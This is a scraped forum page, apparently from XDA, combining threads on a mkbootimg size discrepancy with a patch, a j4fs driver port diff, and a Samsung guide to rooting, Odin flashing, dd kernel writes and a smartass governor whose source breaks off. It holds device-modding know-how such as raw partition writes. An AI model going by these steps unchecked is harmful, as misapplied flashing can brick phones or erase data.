mkbootimg created boot.img creation discrepenacy - General Questions and Answers

Hi,
I have noticed a discrepancy which I am unable to understand and appreciate if someone can provide a clarification in case they have noticed the same issue. I tried to split (using unmkbootimg) boot.img (from Xiaomi Mi MAX update ROMs) and merged it back (using mkbootimg) and found that the newly made boot.img was smaller by 1354 bytes. Appreciate your reply if I am missing anything.
% ls -l boot.img ../boot.img
-rw-rw-r-- 1 skanduru skanduru 12924234 Jan 1 2009 ../boot.img
-rw-rw-r-- 1 skanduru skanduru 12922880 Jan 15 01:07 boot_new.img
% cat output.txt
# kernel written to 'kernel' (10172221 bytes)
# ramdisk written to 'ramdisk.cpio.gz' (2746601 bytes)
# To rebuild this boot image, you can use the command:
mkbootimg --base 0 --pagesize 2048 --kernel_offset 0x80008000 --ramdisk_offset 0x81000000 --second_offset 0x80f00000 --tags_offset 0x80000100 --cmdline
'console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 androidboot.hardware=qcom msm_rtb.filter=0x237 ehci-hcd.park=3 androidboot.bootdevice=7824900.sdhci
lpm_levels.sleep_disabled=1 earlyprintk ramoops_memreserve=4M' --kernel kernel --ramdisk ramdisk.cpio.gz -o boot_new.img
A bindiff of the two images shows that the original boot.img has some stuff (1354 bytes) appended at the bottom which makes the difference. The net result is the boot_new.img doesn't boot up. Just wondering if someone has seen this issue.

boot image to try
The link to boot.img image to try out mkbootimg issue. We can see that @C53000, the original boot.img has extra stuff (1374 bytes).
Image can be downloaded from (Couldn't update it in the previous query)
s000 DOT tinyupload DOT com/?file_id=42124441031490820660

skanduru said:
The link to boot.img image to try out mkbootimg issue. We can see that @C53000, the original boot.img has extra stuff (1374 bytes).
Image can be downloaded from (Couldn't update it in the previous query)
s000 DOT tinyupload DOT com/?file_id=42124441031490820660
Click to expand...
Click to collapse
Could be an issue with Xiaomi image as it doesn't specify second_bootloader size, but appends it. Tried this change and it works. Not sure if it might be the case for potentially other manufacturer's boot.img. Posting it if it could be of some use.
--- a/mkbootimg/unmkbootimg.c
+++ b/mkbootimg/unmkbootimg.c
@@ -80,6 +80,30 @@ int usage(void)
return 1;
}
+int maybe_fix_second_image_size(boot_img_hdr *hdr, void *file_data)
+{
+ int offset = ((hdr->kernel_size + hdr->ramdisk_size
+ + 2*hdr->page_size - 1) / hdr->page_size) * hdr->page_size;
+ char *second_image = ((char *)file_data + offset);
+ u_int16_t *s = (u_int16_t *) second_image;
+ int is_second_image_true = 0;
+
+ if (s[0]) {
+ /*
+ * Second_image does exist ! Calculate the size and fix the
+ * size in hdr.
+ */
+ int size = 0;
+ while (s[0]) {
+ size += 2;
+ s++;
+ }
+ hdr->second_size = size;
+ is_second_image_true = 1;
+ }
+ return is_second_image_true;
+}
+
int main(int argc, char **argv)
{
void *file_data = 0;
@@ -160,7 +184,13 @@ int main(int argc, char **argv)
hdr->ramdisk_size);
}
- if(hdr->second_size != 0) {
+ /*
+ * Even though the second_size is 0, some vendors may place secondary
+ * image there, for ex. Xiaomi. In such a case do calculate the size
+ * based on termination with a null.
+ * XXX: Temp fix.
+ */
+ if(hdr->second_size != 0 || maybe_fix_second_image_size(hdr, file_data)) {
offset = ((hdr->kernel_size + hdr->ramdisk_size
+ 2*hdr->page_size - 1) / hdr->page_size) * hdr->page_size;
if (save_file(second_fn, &((char *)file_data)[offset],

Related

j4fs driver is now OpenSource

Big news for every hacker on Samsung devices! j4fs driver is now OpenSource Enjoy: http://bit.ly/jatK1c
Click to expand...
Click to collapse
http://romkitchen.org/sgs/?s=home
Someone care to explain the benefits, if any, of this? My understanding from what little i read is it will help with kernal development on a decent number of samsung devices.
Edit: as in should i be "super excited", "meh", or "cool beans".
second that question .. does this help us?
Would this driver be the one that controls download mode?
Sent from my GT-I9000 using XDA Premium App
Maybe this?
added: Should have checked supercurio's github
Samsung v1 GT-I9100 sources: [common] param.lfs/j4fs driver (communication with bootloader), now OpenSource, yay!
google :
j4fs...
its a filesystem.... FACT
So my GUESS...
a driver for a filesystem...
like ext4 and fat drivers for handling our other storage..
a new filesystem for us to tweak the crap out of and use..?
though ive been wrong before. that is only a logical conclusion not a factual statement
TRusselo said:
google :
j4fs...
its a filesystem.... FACT
So my GUESS...
a driver for a filesystem...
like ext4 and fat drivers for handling our other storage..
a new filesystem for us to tweak the crap out of and use..?
though ive been wrong before. that is only a logical conclusion not a factual statement
Click to expand...
Click to collapse
Sounds good to me.
Sent from my GT-I9000 using XDA Premium App
TRusselo said:
google :
j4fs...
its a filesystem.... FACT
So my GUESS...
a driver for a filesystem...
like ext4 and fat drivers for handling our other storage..
a new filesystem for us to tweak the crap out of and use..?
though ive been wrong before. that is only a logical conclusion not a factual statement
Click to expand...
Click to collapse
according to the post above you this may be the file system used for the bootloaders on the sgs2 so it would help those folks when hacking.
J4FS porting released
If someone is still interested I've just finished the porting of the J4FS on 3.1.x kernel adding support for normal "block device" (for loopback image mounting).
movitool.ntd.homelinux.org/trac/movitool/wiki/j4fs
Hope this can help...
Ceers
Nitro
And another tool (standalone) to extract j4fs/lfs images (eg. param.lfs).
Note: it only extracts - if you want to modify an image you'll have to use the kernel module from the post above (or a hexeditor and some cleverness).
https://github.com/ius/j4fs_extract
(for Googleability)
whiteguypl said:
http://romkitchen.org/sgs/?s=home
Someone care to explain the benefits, if any, of this? My understanding from what little i read is it will help with kernal development on a decent number of samsung devices.
Edit: as in should i be "super excited", "meh", or "cool beans".
Click to expand...
Click to collapse
dunno for what the driver/partition is used, had troubles (device freeze) with custom kernel an the original module from my GT-I9100 (ICS)
as note: device boots and working without the j4fs module in initramfs...
just for fun a little patch for kernel 3.0.15, just read operation tested.
Code:
Index: jv/llid_kernel.c
===================================================================
--- jv/llid_kernel.c (Revision 2075)
+++ jv/llid_kernel.c (Arbeitskopie)
@@ -95,7 +95,7 @@
set_fs(oldfs);
j4fs_filp->f_flags &= ~O_NONBLOCK;
if (ret < 0) {
- printk(1, "j4fs_filp->read() failed: %d\n", ret);
+ printk(KERN_WARNING "j4fs_filp->read() failed: %d\n", ret);
return J4FS_FAIL;
}
// J4FS for moviNAND merged from ROSSI
@@ -153,7 +153,7 @@
set_fs(oldfs);
j4fs_filp->f_flags &= ~O_NONBLOCK;
if (ret < 0) {
- printk(1, "j4fs_filp->write() failed: %d\n", ret);
+ printk(KERN_WARNING "j4fs_filp->write() failed: %d\n", ret);
return J4FS_FAIL;
}
// J4FS for moviNAND merged from ROSSI
Index: jv/j4fs_kernel.c
===================================================================
--- jv/j4fs_kernel.c (Revision 2075)
+++ jv/j4fs_kernel.c (Arbeitskopie)
@@ -10,7 +10,9 @@
* 2009.03 - Currently managed by SungHwan.yun <[email protected]> @[email protected]
*
*/
-#include <linux/smp_lock.h>
+#include <linux/kernel.h>
+#include <linux/mm.h>
+#include <linux/smp.h>
#include <linux/time.h>
#include <linux/highuid.h>
#include <linux/pagemap.h>
@@ -53,6 +55,8 @@
#define Page_Uptodate(page) test_bit(PG_uptodate, &(page)->flags)
+#define init_MUTEX(sema) sema_init(sema,1)
+
extern j4fs_device_info device_info;
extern unsigned int j4fs_traceMask;
extern unsigned int j4fs_rw_start;
@@ -234,7 +238,7 @@
T(J4FS_TRACE_FS, ("start j4fs_write_begin\n"));
if(to>PAGE_CACHE_SIZE) {
- T(J4FS_TRACE_ALWAYS,("%s %d: page size overflow(pos,index,offset,len,to)=(%d,%d,%d,%d,%d)\n",__FUNCTION__,__LINE__,pos,index,offset,len,to));
+ T(J4FS_TRACE_ALWAYS,("%s %d: page size overflow(pos,index,offset,len,to)=(%llu,%lu,%d,%d,%d)\n",__FUNCTION__,__LINE__,pos,index,offset,len,to));
j4fs_panic("page size overflow");
return -ENOSPC;
}
@@ -1221,7 +1225,7 @@
struct j4fs_sb_info * sbi;
struct j4fs_super_block * es;
struct inode *root;
- u32 tmp, len,ret;
+ u32 ret;
T(J4FS_TRACE_FS,("%s %d\n",__FUNCTION__,__LINE__));
@@ -1322,11 +1326,11 @@
}
-int j4fs_get_sb(struct file_system_type *fs_type, int flags, const char *dev_name, void *data, struct vfsmount *mnt)
+static struct dentry *j4fs_mount(struct file_system_type *fs_type, int flags, const char *dev_name, void *data)
{
T(J4FS_TRACE_FS,("%s %d\n",__FUNCTION__,__LINE__));
- return get_sb_bdev(fs_type, flags, dev_name, data, j4fs_fill_super, mnt);
+ return mount_bdev(fs_type, flags, dev_name, data, j4fs_fill_super);
}
struct kmem_cache * j4fs_inode_cachep;
@@ -1386,7 +1390,7 @@
struct file_system_type j4fs_fs_type = {
.owner = THIS_MODULE,
.name = "j4fs",
- .get_sb = j4fs_get_sb,
+ .mount = j4fs_mount,
.kill_sb = kill_block_super,
.fs_flags = FS_REQUIRES_DEV,
};
@@ -1416,9 +1420,16 @@
return -EINVAL;
}
-int j4fs_fsync(struct file *file, struct dentry *dentry, int datasync)
+static int j4fs_fsync(struct file *file, int datasync)
{
- return 0;
+ int rc = 0;
+
+ rc = generic_file_fsync(file, datasync);
+ if (rc)
+ goto out;
+ rc = vfs_fsync(file, datasync);
+out:
+ return rc;
}
int __init init_j4fs_fs(void)
Index: jv/j4fs.h
===================================================================
--- jv/j4fs.h (Revision 2075)
+++ jv/j4fs.h (Arbeitskopie)
@@ -167,6 +167,7 @@
#define J4FS_RECLAIM_RESET_UNUSED_SPACE
#define J4FS_TRANSACTION_LOGGING
+#undef T
#define T(mask, p) do { if ((mask) & (j4fs_traceMask | J4FS_TRACE_ALWAYS)) TOUT(p); } while (0)
#define POR(mask, p, q) do { if (((mask) & (j4fs_PORMask))&&!(--j4fs_PORCount)) {TOUT(p); while(1); }} while (0)
Index: jv/Makefile
===================================================================
--- jv/Makefile (Revision 2075)
+++ jv/Makefile (Arbeitskopie)
@@ -1,31 +1,5 @@
-##############################################################################
-# COPYRIGHT(C) : Samsung Electronics Co.Ltd, 2006-2011 ALL RIGHTS RESERVED
-# 2009.02 - Currently managed by JongMinKim <[email protected]> , SungHwanYun <[email protected]>
-##############################################################################
-# VERSION&DATE : Version 1.00 2009/02
-##############################################################################
+EXTRA_CFLAGS += -Wframe-larger-than=2048 -Wno-error=declaration-after-statement
-MOD_NAME = j4fs
+obj-$(CONFIG_J4FS) += j4fs.o
-ifneq ($(KERNELRELEASE), )
-
-EXTRA_CFLAGS += -I$(PRJROOT)/modules/include -I$(KDIR)/drivers/tfsr/Inc -I$(KDIR)/include -I$(KDIR)/include/linux -I$(KDIR)/include/asm -D__KERNEL
-
-obj-m := $(MOD_NAME).o
-
-$(MOD_NAME)-y := j4fs_kernel.o llid_kernel.o fsd_common.o
-
-else
-
-all:
- @$(MAKE) -C $(KDIR) \
- SUBDIRS=$(CURDIR) modules
-
-clean:
- rm -f *.o *.ko *.mod.c *~ .*.cmd
-
-install:
- @$(MAKE) --no-print-directory -C $(KDIR) \
- SUBDIRS=$(CURDIR) modules_install
-
-endif
+j4fs-objs := j4fs_kernel.o llid_kernel.o fsd_common.o

[REF] The All In One Guide for SGSA

There isn't really a wholesome guide for this device, which includes everything form flashing to compiling. So i am writing this guide.
Currently its being populated. This will contain everything - flashing, modding, compiling etc.
How to root SGSA : Look here
How to flash firmwares from sammobile using Odin : Look here
Rooting JB :
Download here : Root
How to :
1. Download the zip and place it in the root of your sd card.
PS : SD Card is a must.
2. Reboot to the stock recovery.
3. Select install update from external storage.
4. Select the root.zip file.
5. Viola
Enjoy your rooted JB.
Original post here.
Rooting GB :
Please note that this method will increase the binary counter. A more complex method to root GB is available here which doesn't increase the binary counter.
This kernel will provide you the standard stock kernel and also includes TWRP recovery.
( disclaimer )
I AM NOT TO BE HELD RESPONSIBLE IF YOU DAMAGE YOUR PHONE
Using Odin to flash this kernel WILL increase your binary counter.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( features )
- Team Win Recovery Project 2.2.1
- CIFS Support
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( how to install using Odin )
1. Restart into download mode by pressing Power + Home + Vol Down
2. Start Odin, and flash the attached kernel as PDA.
Remember to extract the attached file only once. if you end up with a kernel.bin.md5 you extracted twice!
Do not use the PIT, do not have any options checked except for "Auto reboot" and "F. Reset Time"
3. Wait for the device to reboot
( how to install using DD )
This method does not increase your binary counter, but your phone needs to be rooted so you can perform this!
IF YOU'RE NOT FAMILIAR WITH DD I RECOMMEND YOU TO AVOID THIS METHOD
1. Extract the attached file twice. You will end up with a kernel.bin.md5 file
2. Put the kernel.bin.md5 file to /sdcard
3. Start adb shell
4. Do the following commands:
Code:
$ su
# dd if=/sdcard/kernel.bin.md5 of=/dev/block/mmcblk0p15
# reboot
5. Wait for the device to reboot.
Click to expand...
Click to collapse
Download the pre-rooted kernel here.
Flashing with Odin :
Odin is the saviour tool for all Samsung devices. The method for flashing by Odin differs from device to device.
This thread will give step by step instructions on how to flash a stock rom from Odin on the GT-I9070/p :
A. Download Odin tools from here : Odin Tools
Pass : shaaan
B. Download the stock rom from : SamFirmware
Setting up Odin :
1. Make sure you have installed the necessary drivers for this device. The drivers can be installed from within KIES or seperately here.
2. Run Odin as administrator.
3. Setting up the files is divided in two types depending on the firmware type :
a. If the firmware is a multi package file, put the files in the corresponding sections.
ie. CSC file in CSC section, PDA file in PDA section.
b. If the firmware is a single package, add the single file in the PDA section.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
4. Now that Odin is setup, put the phone in download mode. To do that, power off the phone and press 'home+power+volume down' buttons together. Keep the buttons pressed till Download mode appears.
5. Now that Odin and the phone are setup, connect the phone to the device. Odin will detect the device and show something like 'com port (1)'
6. Flash the device.
7. The flash will take 5 minutes for a full flash on average.
8. When the flashing is complete, DO NOT remove the device until Odin shows ' PASS '.
9. The device will reboot. Remove the device, go to recovery mode and do a factory/data reset.
That's it. Happy flashing peeps..!!
ROM Modding
Now that we are done with basic things like rooting and flashing, let's move on to some complex stuff..
Tools needed -
1. Apktool
2. XUltimate for deodexing
3. Notepad ++
4. Baksmali manager ( attached )
5. DSIXDA's Android kitchen - only if you really want to use it. but i recommend doing everything manually.
Click to expand...
Click to collapse
Step I :
Setup Android SDK. Instructions here.
Once the SDK is setup, run the command "android" in command prompt. It should look something like this.
Make sure that your PC recognizes the device. Run the command "adb devices". It should show something like this.
Step II :
Once these basic things are setup, install apktool :
1. Download apktool.
2. There will be two files, they will be .bz2 files.
3. Create a new folder called apktool.
4. Put it here: C:\Users\<your username>\apktool.
5. Open these with 7zip. You’ll notice that inside there are .tar files.
6. Double-click the .tar file, and now you’ll see the files.
7. Extract the files from BOTH zips to your new apktool folder at C:\Users\<your username>\apktool.
8. You’ll have 3 files total now in your apktool folder: aapt.exe, apktool.bat, apktool.jar.
Click to expand...
Click to collapse
Now install Notepad++
Restart the computer.
Using apktool :
Generally it is not required to install the framework files, but apps like '/system/app/Settings.apk' need it.
The general commands for apktool are -
apktool d framework-res.apk -- Decompiles framework-res.apk
apktool b framework-res -- Builds the modified files
apktool if path_to_framework-res.apk -- Installs framework-res. Do the same for twframework-res
Click to expand...
Click to collapse
Preface :
OK a lot of people have been asking about building kernels, so here is my best shot at a tutorial. You guys shouldn't expect my little walk through here plus another person’s source to make you a "developer", all it will prove is that you can copy/paste. Also if you follow this guide, I am not responsible for anything that you may do that results in destruction, death, or other negative side-affects. You really shouldn't be messing with this stuff unless you know what you are doing, or doing a LOT of research along the way.
However please use this guide as a springboard for knowledge, to give you some key terms to google, to turn on those lightbulbs in your head and get those gears churning.
Note: This is not a newbie's guide to Linux. Before you post your question please look at it. If it involves the syntax of the command/what a command does you need to do your own research elsewhere before attempting to continue with this guide.
Click to expand...
Click to collapse
I. Setting up the environment :
A. Install Ubuntu 12.04 (Not holding your hand here, if you can't do this you shouldn't be messing with kernels)
B. Installing required packages: Type this code into the terminal.
Code:
For 32 and 64 bit systems :
sudo apt-get install git-core gnupg flex bison gperf libsdl1.2-dev libesd0-dev libwxgtk2.8-dev squashfs-tools build-essential zip curl
libncurses5-dev zlib1g-dev openjdk-6-jre openjdk-6-jdk pngcrush schedtool
For 64 bit systems only :
g++-multilib lib32z1-dev lib32ncurses5-dev lib32readline-gplv2-dev gcc-4.7-multilib g++-4.5-multilib
Also make sure you have ADB installed. Its a must.
C. Open a terminal
D. Type "mkdir -p android/kernel"
The above steps explained:
A. Installing a linux distro. You could really install any Linux distro however Ubuntu in my eyes is the easy to use and install, and widely supported.
B. Installing needed packages. These are needed for building the kernel. No I can't tell you what every single package does, it is your job to research and figure that out.
C. Ummm...duh?
D. Building a directory structure that will help keep us organized. The "mkdir" command creates a directory. The more you type these commands the more familiar you will become with them.
Click to expand...
Click to collapse
II. Downloading the source :
A. Download the relevant source from the Samsung Opensource Website
B. Once the source is download, extract it into the "android/kernel" directory that we made in the previous step.
C. Grab your desired toolchain. I generally recommend the CodeSourcery toolchain.
Click to expand...
Click to collapse
III. Modifications :
This is the part people are curious about, they want to make modifications to the kernel to make it "special". Start all these from the root directory of your kernel source.
Mod 1. Applying a patch
A. Download the patch you wish to apply, in this case this one should work.
B. Save that file as "kernelPatch" in your kernel directory.
C. Open a Terminal
D. Move into the root directory of the kernel you wish to patch.
E. Type "patch -p1 < ../kernelPatch"
The above steps explained:
A. Pretty simple, I mean we need a patch. The patch itself is quite simply a diff between the original kernel source tree and the source tree containing the changes. I'll post a quick tutorial on how to create a patch in the third post. The patch above contains multiple governors to be added to your kernel.
B. Self-explanatory
C. Self-explanatory
D. Self-explanatory
E. Basically we run the patch command on our source using the patch we downloaded previously. The "patch" portion is the binary itself, the "-p1" option allows you to control the number of forward slashes to remove from file paths(You'll need to look at this option more if you are using weird directory structures or applying the patches from a odd location). The "<" operator directs the content of our "../kernelPatch" file into the command.
Click to expand...
Click to collapse
Mod 2. Adding a Governor
A. Open "drivers/cpufreq/Kconfig"
B. Add the following lines in appropriate spot amongst the other govenor's
Code:
config CPU_FREQ_DEFAULT_GOV_SMARTASS
bool "smartass"
select CPU_FREQ_GOV_SMARTASS
select CPU_FREQ_GOV_PERFORMANCE
help
Use the CPUFreq governor 'smartass' as default.
Code:
config CPU_FREQ_GOV_SMARTASS
tristate "'smartass' cpufreq governor"
depends on CPU_FREQ
help
smartass' - a "smart" optimized governor!
If in doubt, say N.
C. Open "drivers/cpufreq/Makefile"
D. Add the following line in the appropriate spot.
Code:
obj-$(CONFIG_CPU_FREQ_GOV_SMARTASS) += cpufreq_smartass.o
E. Create a file called "drivers/cpufreq/cpufreq_smartass.c"
F. Put the following code in that file.
Code:
/*
* drivers/cpufreq/cpufreq_smartass.c
*
* Copyright (C) 2010 Google, Inc.
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* Author: Erasmux
*
* Based on the interactive governor By Mike Chan ([email protected])
* which was adaptated to 2.6.29 kernel by Nadlabak ([email protected])
*
* requires to add
* EXPORT_SYMBOL_GPL(nr_running);
* at the end of kernel/sched.c
*
*/
#include <linux/cpu.h>
#include <linux/cpumask.h>
#include <linux/cpufreq.h>
#include <linux/sched.h>
#include <linux/tick.h>
#include <linux/timer.h>
#include <linux/workqueue.h>
#include <linux/moduleparam.h>
#include <asm/cputime.h>
#include <linux/earlysuspend.h>
static void (*pm_idle_old)(void);
static atomic_t active_count = ATOMIC_INIT(0);
struct smartass_info_s {
struct cpufreq_policy *cur_policy;
struct timer_list timer;
u64 time_in_idle;
u64 idle_exit_time;
unsigned int force_ramp_up;
unsigned int enable;
};
static DEFINE_PER_CPU(struct smartass_info_s, smartass_info);
/* Workqueues handle frequency scaling */
static struct workqueue_struct *up_wq;
static struct workqueue_struct *down_wq;
static struct work_struct freq_scale_work;
static u64 freq_change_time;
static u64 freq_change_time_in_idle;
static cpumask_t work_cpumask;
static unsigned int suspended;
/*
* The minimum amount of time to spend at a frequency before we can ramp down,
* default is 45ms.
*/
#define DEFAULT_DOWN_RATE_US 20000
static unsigned long down_rate_us;
/*
* When ramping up frequency with no idle cycles jump to at least this frequency.
* Zero disables. Set a very high value to jump to policy max freqeuncy.
*/
#define DEFAULT_UP_MIN_FREQ 1152000
static unsigned int up_min_freq;
/*
* When sleep_max_freq>0 the frequency when suspended will be capped
* by this frequency. Also will wake up at max frequency of policy
* to minimize wakeup issues.
* Set sleep_max_freq=0 to disable this behavior.
*/
#define DEFAULT_SLEEP_MAX_FREQ 537600
static unsigned int sleep_max_freq;
/*
* Sampling rate, I highly recommend to leave it at 2.
*/
#define DEFAULT_SAMPLE_RATE_JIFFIES 2
static unsigned int sample_rate_jiffies;
/*
* Freqeuncy delta when ramping up.
* zero disables causes to always jump straight to max frequency.
*/
#define DEFAULT_RAMP_UP_STEP 614400
static unsigned int ramp_up_step;
/*
* Max freqeuncy delta when ramping down. zero disables.
*/
#define DEFAULT_MAX_RAMP_DOWN 384000
static unsigned int max_ramp_down;
/*
* CPU freq will be increased if measured load > max_cpu_load;
*/
#define DEFAULT_MAX_CPU_LOAD 75
static unsigned long max_cpu_load;
/*
* CPU freq will be decreased if measured load < min_cpu_load;
*/
#define DEFAULT_MIN_CPU_LOAD 30
static unsigned long min_cpu_load;
static int cpufreq_governor_smartass(struct cpufreq_policy *policy,
unsigned int event);
#ifndef CONFIG_CPU_FREQ_DEFAULT_GOV_SMARTASS
static
#endif
struct cpufreq_governor cpufreq_gov_smartass = {
.name = "smartass",
.governor = cpufreq_governor_smartass,
.max_transition_latency = 6000000,
.owner = THIS_MODULE,
};
static void cpufreq_smartass_timer(unsigned long data)
{
u64 delta_idle;
u64 update_time;
u64 now_idle;
struct smartass_info_s *this_smartass = &per_cpu(smartass_info, data);
struct cpufreq_policy *policy = this_smartass->cur_policy;
now_idle = get_cpu_idle_time_us(data, &update_time);
if (update_time == this_smartass->idle_exit_time)
return;
delta_idle = cputime64_sub(now_idle, this_smartass->time_in_idle);
//printk(KERN_INFO "smartass: t=%llu i=%llu\n",cputime64_sub(update_time,this_smartass->idle_exit_time),delta_idle);
/* Scale up if there were no idle cycles since coming out of idle */
if (delta_idle == 0) {
if (policy->cur == policy->max)
return;
if (nr_running() < 1)
return;
this_smartass->force_ramp_up = 1;
cpumask_set_cpu(data, &work_cpumask);
queue_work(up_wq, &freq_scale_work);
return;
}
/*
* There is a window where if the cpu utlization can go from low to high
* between the timer expiring, delta_idle will be > 0 and the cpu will
* be 100% busy, preventing idle from running, and this timer from
* firing. So setup another timer to fire to check cpu utlization.
* Do not setup the timer if there is no scheduled work.
*/
if (!timer_pending(&this_smartass->timer) && nr_running() > 0) {
this_smartass->time_in_idle = get_cpu_idle_time_us(
data, &this_smartass->idle_exit_time);
mod_timer(&this_smartass->timer, jiffies + sample_rate_jiffies);
}
if (policy->cur == policy->min)
return;
/*
* Do not scale down unless we have been at this frequency for the
* minimum sample time.
*/
if (cputime64_sub(update_time, freq_change_time) < down_rate_us)
return;
cpumask_set_cpu(data, &work_cpumask);
queue_work(down_wq, &freq_scale_work);
}
static void cpufreq_idle(void)
{
struct smartass_info_s *this_smartass = &per_cpu(smartass_info, smp_processor_id());
struct cpufreq_policy *policy = this_smartass->cur_policy;
pm_idle_old();
if (!cpumask_test_cpu(smp_processor_id(), policy->cpus))
return;
/* Timer to fire in 1-2 ticks, jiffie aligned. */
if (timer_pending(&this_smartass->timer) == 0) {
this_smartass->time_in_idle = get_cpu_idle_time_us(
smp_processor_id(), &this_smartass->idle_exit_time);
mod_timer(&this_smartass->timer, jiffies + sample_rate_jiffies);
}
}
/*
* Choose the cpu frequency based off the load. For now choose the minimum
* frequency that will satisfy the load, which is not always the lower power.
*/
static unsigned int cpufreq_smartass_calc_freq(unsigned int cpu, struct cpufreq_policy *policy)
{
unsigned int delta_time;
unsigned int idle_time;
unsigned int cpu_load;
unsigned int new_freq;
u64 current_wall_time;
u64 current_idle_time;
current_idle_time = get_cpu_idle_time_us(cpu, &current_wall_time);
idle_time = (unsigned int)( current_idle_time - freq_change_time_in_idle );
delta_time = (unsigned int)( current_wall_time - freq_change_time );
cpu_load = 100 * (delta_time - idle_time) / delta_time;
//printk(KERN_INFO "Smartass calc_freq: delta_time=%u cpu_load=%u\n",delta_time,cpu_load);
if (cpu_load < min_cpu_load) {
cpu_load += 100 - max_cpu_load; // dummy load.
new_freq = policy->cur * cpu_load / 100;
if (max_ramp_down && new_freq < policy->cur - max_ramp_down)
new_freq = policy->cur - max_ramp_down;
//printk(KERN_INFO "Smartass calc_freq: %u => %u\n",policy->cur,new_freq);
return new_freq;
} if (cpu_load > max_cpu_load) {
if (ramp_up_step)
new_freq = policy->cur + ramp_up_step;
else
new_freq = policy->max;
return new_freq;
}
return policy->cur;
}
/* We use the same work function to sale up and down */
static void cpufreq_smartass_freq_change_time_work(struct work_struct *work)
{
unsigned int cpu;
unsigned int new_freq;
struct smartass_info_s *this_smartass;
struct cpufreq_policy *policy;
cpumask_t tmp_mask = work_cpumask;
for_each_cpu(cpu, tmp_mask) {
this_smartass = &per_cpu(smartass_info, cpu);
policy = this_smartass->cur_policy;
if (this_smartass->force_ramp_up) {
this_smartass->force_ramp_up = 0;
if (nr_running() == 1) {
cpumask_clear_cpu(cpu, &work_cpumask);
return;
}
if (policy->cur == policy->max)
return;
if (ramp_up_step)
new_freq = policy->cur + ramp_up_step;
else
new_freq = policy->max;
if (suspended && sleep_max_freq) {
if (new_freq > sleep_max_freq)
new_freq = sleep_max_freq;
} else {
if (new_freq < up_min_freq)
new_freq = up_min_freq;
}
} else {
new_freq = cpufreq_smartass_calc_freq(cpu,policy);
// in suspend limit to sleep_max_freq and
// jump straight to sleep_max_freq to avoid wakeup problems
if (suspended && sleep_max_freq &&
(new_freq > sleep_max_freq || new_freq > policy->cur))
new_freq = sleep_max_freq;
}
if (new_freq > policy->max)
new_freq = policy->max;
if (new_freq < policy->min)
new_freq = policy->min;
__cpufreq_driver_target(policy, new_freq,
CPUFREQ_RELATION_L);
freq_change_time_in_idle = get_cpu_idle_time_us(cpu,
&freq_change_time);
cpumask_clear_cpu(cpu, &work_cpumask);
}
}
static ssize_t show_down_rate_us(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%lu\n", down_rate_us);
}
static ssize_t store_down_rate_us(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0 && input >= 1000 && input <= 100000000)
down_rate_us = input;
return res;
}
static struct freq_attr down_rate_us_attr = __ATTR(down_rate_us, 0644,
show_down_rate_us, store_down_rate_us);
static ssize_t show_up_min_freq(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%u\n", up_min_freq);
}
static ssize_t store_up_min_freq(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0 && input >= 0)
up_min_freq = input;
return res;
}
static struct freq_attr up_min_freq_attr = __ATTR(up_min_freq, 0644,
show_up_min_freq, store_up_min_freq);
static ssize_t show_sleep_max_freq(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%u\n", sleep_max_freq);
}
static ssize_t store_sleep_max_freq(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0 && input >= 0)
sleep_max_freq = input;
return res;
}
static struct freq_attr sleep_max_freq_attr = __ATTR(sleep_max_freq, 0644,
show_sleep_max_freq, store_sleep_max_freq);
static ssize_t show_sample_rate_jiffies(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%u\n", sample_rate_jiffies);
}
static ssize_t store_sample_rate_jiffies(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0 && input > 0 && input <= 1000)
sample_rate_jiffies = input;
return res;
}
static struct freq_attr sample_rate_jiffies_attr = __ATTR(sample_rate_jiffies, 0644,
show_sample_rate_jiffies, store_sample_rate_jiffies);
static ssize_t show_ramp_up_step(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%u\n", ramp_up_step);
}
static ssize_t store_ramp_up_step(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0)
ramp_up_step = input;
return res;
}
static struct freq_attr ramp_up_step_attr = __ATTR(ramp_up_step, 0644,
show_ramp_up_step, store_ramp_up_step);
static ssize_t show_max_ramp_down(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%u\n", max_ramp_down);
}
static ssize_t store_max_ramp_down(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0)
max_ramp_down = input;
return res;
}
static struct freq_attr max_ramp_down_attr = __ATTR(max_ramp_down, 0644,
show_max_ramp_down, store_max_ramp_down);
static ssize_t show_max_cpu_load(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%lu\n", max_cpu_load);
}
static ssize_t store_max_cpu_load(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0 && input > 0 && input <= 100)
